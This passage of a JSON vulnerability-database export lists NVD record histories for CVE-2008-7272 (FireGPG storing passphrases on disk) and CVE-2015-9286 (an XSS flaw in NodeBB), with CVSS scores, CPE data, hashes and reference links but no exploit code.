"9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "a0acab3127efc281e78e28b6a414532c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-09-21T13:59:22", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 10}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T13:59:22"}, {"bulletin": {"affectedSoftware": [{"name": "getfiregpg firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-11T14:25:16", "references": [], "rev": 2}, "score": {"modified": "2020-02-11T14:25:16", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "a5439a88032d0d96d6b3b175c5bb2652a08a5ac9dd8565abd675e989e312c52e", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "c78a0c9b48c95bd2d49fb402de9ce674", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "d2db9f7acf8121ca4d72b70e2934db08", "key": "affectedSoftware"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-02-11T14:25:16", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 10}, "differentElements": ["cvss3", "cpe", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-11T14:25:16"}, {"bulletin": {"affectedSoftware": [{"name": "getfiregpg firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user?s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users?s private key.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-11-15T19:55:37", "references": []}, "score": {"modified": "2019-11-15T19:55:37", "value": 2.4, "vector": "NONE"}}, "hash": "05a389bab8cb239109f07a53e4f0a9c76cc24d31548b23dfad15c1385b48f5a5", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "b0552313c96be75e9ec1c10adb56b096", "key": "modified"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "240c2c1dd6f5cc5cbeb07774547c6c2b", "key": "description"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "c78a0c9b48c95bd2d49fb402de9ce674", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "d2db9f7acf8121ca4d72b70e2934db08", "key": "affectedSoftware"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2019-11-15T19:55:37", "modified": "2019-11-14T14:28:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 2}, "differentElements": ["description", "modified"], "edition": 2, "lastseen": "2019-11-15T19:55:37"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "enchantments": {"dependencies": {"modified": "2021-02-02T05:35:21", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T05:35:21", "rev": 2, "value": 2.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://security-tracker.debian.org/tracker/CVE-2008-7272", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7272"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "refsource": "MISC", "tags": ["Third Party Advisory", "Issue Tracking"], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386"}], "hash": "feff88852d5f44ef4f736cb629de97022a0e3f23b99e0deec3d9ee5daaa7d8df", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "4847e3110691b6a6a4c7664c0f127f70", "key": "extraReferences"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "675695b80d1f3d2196a77047e1ceba64", "key": "cpeConfiguration"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "a0acab3127efc281e78e28b6a414532c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "immutableFields": [], "lastseen": "2021-02-02T05:35:21", "modified": "2020-02-10T21:16:00", "objectVersion": "1.5", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 19}, "different_elements": ["cpeConfiguration"], "edition": 8, "lastseen": "2021-02-02T05:35:21"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "*"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-11-29T22:56:16", "references": [], "rev": 2}, "score": {"modified": "2020-11-29T22:56:16", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "20ae55db346f6babbeac989b07a5b26e855e45e42cfda6773d64bbcb84e4ef79", "hashmap": [{"hash": "d647e62c83e294ffd6f56a7c761beece", "key": "affectedSoftware"}, {"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "675695b80d1f3d2196a77047e1ceba64", "key": "cpeConfiguration"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-11-29T22:56:16", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 15}, "differentElements": ["affectedSoftware"], "edition": 6, "lastseen": "2020-11-29T22:56:16"}], "edition": 9, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "a0acab3127efc281e78e28b6a414532c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "77e03828e2d6f83f8fa932acfe8daff3"}, {"key": "cvelist", "hash": "767e67f900c3effb5b550959d21fb12e"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "cvss2", "hash": "9bc143c7676b7e5a3fd9537d7507310b"}, {"key": "cvss3", "hash": "cd391b15e7a01ae2bbfcca256d89bfb8"}, {"key": "cwe", "hash": "92c16862fafe4d9eb26185434339836e"}, {"key": "description", "hash": "95669953499c0eb40b242611dfbe75d4"}, {"key": "extraReferences", "hash": "4847e3110691b6a6a4c7664c0f127f70"}, {"key": "href", "hash": "9258b012e591cc93a7c6b0cd1b5c6b05"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "3c75b36a7f1966a251dbe6148b866f97"}, {"key": "published", "hash": "1162e82aa1c980ee7ebee4af4c99369c"}, {"key": "references", "hash": "54b0c94164bf625d039c58f14cd4c116"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5db042f8057f3f288fe9cd4213121eb2"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "f34f5d089606f7d870ccc28642bf61f774619d905673726848fc15f3a6590575", "viewCount": 25, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-21T20:41:43", "rev": 2}, "score": {"value": 2.4, "vector": "NONE", "modified": "2021-04-21T20:41:43", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cpe23": [], "cwe": ["CWE-312"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "cpe_name": [], "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://security-tracker.debian.org/tracker/CVE-2008-7272", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7272"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "refsource": "MISC", "tags": ["Third Party Advisory", "Issue Tracking"], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386"}], "immutableFields": []}, {"id": "CVE-2015-9286", "bulletinFamily": "NVD", "title": "CVE-2015-9286", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "published": "2019-04-30T14:29:00", "modified": "2019-05-01T14:22:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "reporter": "cve@mitre.org", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "cvelist": ["CVE-2015-9286"], "type": "cve", "lastseen": "2021-04-22T23:51:50", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:21:32", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2021-02-02T06:21:32", "rev": 2, "value": 1.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://github.com/NodeBB/NodeBB/pull/3371", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/NodeBB/NodeBB/pull/3371"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"}, {"name": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "refsource": "MISC", "tags": ["Third Party Advisory", "Release Notes"], "url": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529"}, {"name": "https://www.vulnerability-lab.com/get_content.php?id=1608", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.vulnerability-lab.com/get_content.php?id=1608"}], "hash": "e0413d958386f6534538918bca2249dcc4f383174e07b3bfd828fd87bab2fae7", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "db8254901fea804d4d910fc508c1be32", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "immutableFields": [], "lastseen": "2021-02-02T06:21:32", "modified": "2019-05-01T14:22:00", "objectVersion": "1.5", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 10}, "different_elements": ["cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:21:32"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T14:09:33", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-09-21T14:09:33", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "e856f7b9491cefcc50723678fc0433f12f7c6ae1abe16d206957fd00f74aa6e1", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": 